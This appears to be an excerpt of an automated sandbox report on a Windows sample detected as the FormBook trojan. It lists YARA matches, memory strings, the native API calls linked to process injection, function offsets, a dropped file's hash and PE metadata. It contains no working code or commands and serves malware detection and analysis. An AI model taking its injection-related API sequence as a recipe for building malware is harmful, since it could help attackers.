Source: SearchProtocolHost.exe, 00000010.00000003.2406556463.00000000079FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: FGGx944Qu7.exe, TBsjWljiCpR.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SearchProtocolHost.exe, 00000010.00000003.2412246200.0000000007A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1946159228.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1945331228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.2863668034.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2030469230.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2863047851.0000000004760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.1948193173.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0042AEF3 NtClose,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040A5A8 NtMapViewOfSection,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632B60 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DF0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C70 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016335C0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01634340 NtSetContextThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01634650 NtSuspendThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BE0 NtQueryValueKey,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BF0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632BA0 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632B80 NtQueryInformationFile,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AF0 NtWriteFile,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AD0 NtReadFile,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632AB0 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D30 NtUnmapViewOfSection,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D00 NtSetInformationFile,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632D10 NtMapViewOfSection,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DD0 NtDelayExecution,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632DB0 NtEnumerateKey,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C60 NtCreateKey,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632C00 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CF0 NtOpenProcess,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CC0 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632CA0 NtQueryInformationToken,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F60 NtCreateProcessEx,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F30 NtCreateSection,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FE0 NtCreateFile,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FA0 NtQuerySection,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632FB0 NtResumeThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632F90 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632E30 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632EE0 NtQueueApcThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632EA0 NtAdjustPrivilegesToken,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01632E80 NtReadVirtualMemory,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633010 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633090 NtSetValueKey,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016339B0 NtGetContextThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633D70 NtOpenThread,
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01633D10 NtOpenProcessToken,

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_015EDFEC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054ED1B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E68C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E0040
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E0006
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 0_2_054E68B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402853
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402860
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401150
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00403270
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004012C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FA8A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FA93
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0042D323
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004163DE
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_004163E3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00402440
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040FCB3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0040DD33
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_00401D80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01688158
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0100
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169A118
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B81CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C01AA
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B41A2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01692000
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BA352
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C03E6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160E3F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0274
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016802C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600535
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016C0591
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B2446
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A4420
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AE4F6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600770
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01624750
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FC7C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161C6E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01616962
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016029A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016CA9A6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160A840
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01602840
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0162E8F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015E68B8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BAB40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B6BD7
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FEA80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160AD00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169CD1F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015FADE0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01618DBF
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600C00
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F0CF2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A0CB5
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01674F40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01642F28
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01620F30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A2F30
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F2FC8
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0167EFA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01600E59
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BEE26
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BEEDB
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01612E90
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BCE93
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016CB16B
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163516C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015EF172
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0160B1B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B70E9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF0E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016070C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016AF0CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015ED34C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B132D
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0164739A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A12ED
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161D2F0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161B2C0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016052A0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7571
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169D5B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_015F1460
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF43F
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BF7B0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B16CC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01609950
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161B950
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01695910
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0166D800
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016038E0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFB76
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01675BF0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0163DBF9
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161FB80
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01673A6C
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFA49
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7A46
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016ADAC6
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01645AA0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0169DAAC
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016A1AA3
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B7D73
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01603D40
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016B1D5A
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_0161FDC0
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01679C32
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFCF2
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFF09
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_016BFFB1
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01601F92
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: 8_2_01609EB0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_0161DFEC
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34130
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F38860
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C3A8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34120
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C7E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3C7D3
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3DA80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F33B80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F33B70
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BB33
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BB38
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F3BF70
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34D20
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 9_2_02F34D10
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01040100
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01096000
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010D02C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050535
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01074750
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050770
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104C7C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106C6E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01066962
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010529A0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01052840
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105A840
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01088890
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010368B8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0107E8F0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104EA80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105AD00
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105ED7A
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01068DBF
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01058DC0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0104ADE0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050C00
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01040CF2
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01092F28
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01070F30
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C4F40
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010CEFA0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01042FC8
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01050E59
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01062E90
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108516C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0103F172
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105B1B0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0103D34C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010533F3
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010552A0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106B2C0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106D2F0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01041460
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01053497
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010974E0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0105B730
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01059950
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106B950
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01055990
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010BD800
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106FB80
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0108DBF9
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C5BF0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C3A6C
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01053D40
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_0106FDC0
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01069C20
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_010C9C32
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01051F92
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: 13_2_01059EB0

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe B600C43E2980691952532A79E7A0AEF2351AEEF6F740FD2F56647509C93B6DA0

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 01635130 appears 58 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 0166EA12 appears 86 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 01647E54 appears 99 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 0167F290 appears 103 times
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Code function: String function: 015EB970 appears 262 times
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: String function: 01097E54 appears 96 times
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Code function: String function: 010BEA12 appears 36 times

Source: FGGx944Qu7.exe

Static PE information: invalid certificate

Source: FGGx944Qu7.exe, 00000000.00000002.1690219272.0000000004019000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1681935621.000000000130E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1690219272.0000000004A0A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1693048544.00000000056A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000000.00000002.1684136801.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe, 00000008.00000002.1946419926.00000000016ED000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs FGGx944Qu7.exe
Source: FGGx944Qu7.exe	Binary or memory string: OriginalFilenameQbmX.exen' vs FGGx944Qu7.exe

Source: FGGx944Qu7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.FGGx944Qu7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.FGGx944Qu7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2863758312.0000000003070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000002.2861231272.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
